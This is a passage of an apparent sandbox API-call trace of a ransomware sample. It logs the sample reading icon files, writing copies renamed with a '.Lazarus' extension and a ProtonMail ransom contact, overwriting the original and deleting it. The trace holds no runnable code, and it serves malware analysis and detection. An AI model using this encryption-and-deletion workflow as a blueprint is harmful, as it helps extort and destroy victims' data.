returned 0x0 [0076.400] SetLastError (dwErrCode=0x0) [0076.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d708 | out: hHeap=0x20000) returned 1 [0076.400] WriteFile (in: hFile=0x410, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327ef70*=0x480, lpOverlapped=0x0) returned 1 [0076.401] GetLastError () returned 0x0 [0076.401] SetLastError (dwErrCode=0x0) [0076.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0076.401] GetLastError () returned 0x0 [0076.401] SetLastError (dwErrCode=0x0) [0076.401] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0076.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0076.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0076.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0076.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0076.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x92460 | out: hHeap=0x20000) returned 1 [0076.402] CloseHandle (hObject=0x410) returned 1 [0076.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0076.403] CloseHandle (hObject=0x42c) returned 1 [0076.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0076.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0076.404] AreFileApisANSI () returned 1 [0076.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0076.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x717c0 [0076.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 45 [0076.404] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0076.405] GetFileType (hFile=0x42c) returned 0x1 [0076.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0076.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0076.405] GetLastError () returned 0xb7 [0076.405] SetLastError (dwErrCode=0xb7) [0076.405] WriteFile (in: hFile=0x42c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0076.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0076.406] CloseHandle (hObject=0x42c) returned 1 [0076.406] AreFileApisANSI () returned 1 [0076.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0076.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x717c0 [0076.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ddc8, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 45 [0076.407] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico")) returned 1 [0076.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x94680 | out: hHeap=0x20000) returned 1 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bae0 | out: hHeap=0x20000) returned 1 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0076.408] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.408] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.408] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x1, dwReserved1=0x0, cFileName="SysReqNotMet.ico", cAlternateFileName="SYSREQ~2.ICO")) returned 1 [0076.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0076.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0076.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0076.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0076.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0076.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0076.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0076.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0076.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0076.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0076.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0076.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0076.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0076.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0076.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0076.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0076.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0076.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0076.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0076.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0076.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0076.409] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.409] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.409] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.409] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0076.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0076.409] AreFileApisANSI () returned 1 [0076.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico", lpUsedDefaultChar=0x0) returned 48 [0076.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0076.409] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.409] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0076.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0076.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0076.409] AreFileApisANSI () returned 1 [0076.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0076.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0076.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=48 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 48 [0076.410] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0076.410] GetFileType (hFile=0x42c) returned 0x1 [0076.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0076.410] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0076.410] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0076.410] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0076.410] CloseHandle (hObject=0x42c) returned 1 [0076.411] AreFileApisANSI () returned 1 [0076.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0076.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0076.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=48 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 48 [0076.411] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0076.411] GetFileType (hFile=0x42c) returned 0x1 [0076.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0076.411] CloseHandle (hObject=0x42c) returned 1 [0076.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0076.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0076.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0076.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0076.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0076.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0076.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0076.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0076.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0076.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0076.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0076.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0076.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0076.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0076.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0076.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0076.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0076.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0076.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0076.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0076.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0076.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0076.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0076.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0076.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0076.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0076.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0076.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0076.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0076.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0076.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0076.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0076.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0076.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0076.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0076.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0076.412] AreFileApisANSI () returned 1 [0076.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0076.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0076.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=48 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 48 [0076.412] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e)) returned 1 [0076.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0076.412] AreFileApisANSI () returned 1 [0076.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0076.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0076.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0076.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0076.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0076.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0076.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0076.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0076.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0076.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0076.413] GetLastError () returned 0x0 [0076.413] SetLastError (dwErrCode=0x0) [0076.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4ddc8 [0076.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x94680 [0076.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c288 [0076.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d7b0 [0076.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0076.413] GetLastError () returned 0x0 [0076.413] SetLastError (dwErrCode=0x0) [0076.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0076.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0076.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71a30 [0076.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0076.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8abb8 [0076.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0076.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0076.413] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0076.413] AreFileApisANSI () returned 1 [0076.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8abb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 110 [0076.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xdc) returned 0x5a6b8 [0076.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8abb8, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=110 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 110 [0076.414] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0076.414] GetFileType (hFile=0x42c) returned 0x1 [0076.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0076.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0076.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0076.414] AreFileApisANSI () returned 1 [0076.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0076.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0076.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=48 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 48 [0076.414] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0076.415] GetFileType (hFile=0x410) returned 0x1 [0076.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0076.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0076.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0076.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0076.415] GetLastError () returned 0x0 [0076.415] SetLastError (dwErrCode=0x0) [0076.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0076.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0076.415] GetLastError () returned 0x0 [0076.415] SetLastError (dwErrCode=0x0) [0076.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0076.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0076.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0076.415] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x47e, lpOverlapped=0x0) returned 1 [0076.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0076.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0076.417] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x92460 [0076.417] GetLastError () returned 0x0 [0076.417] SetLastError (dwErrCode=0x0) [0076.418] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, 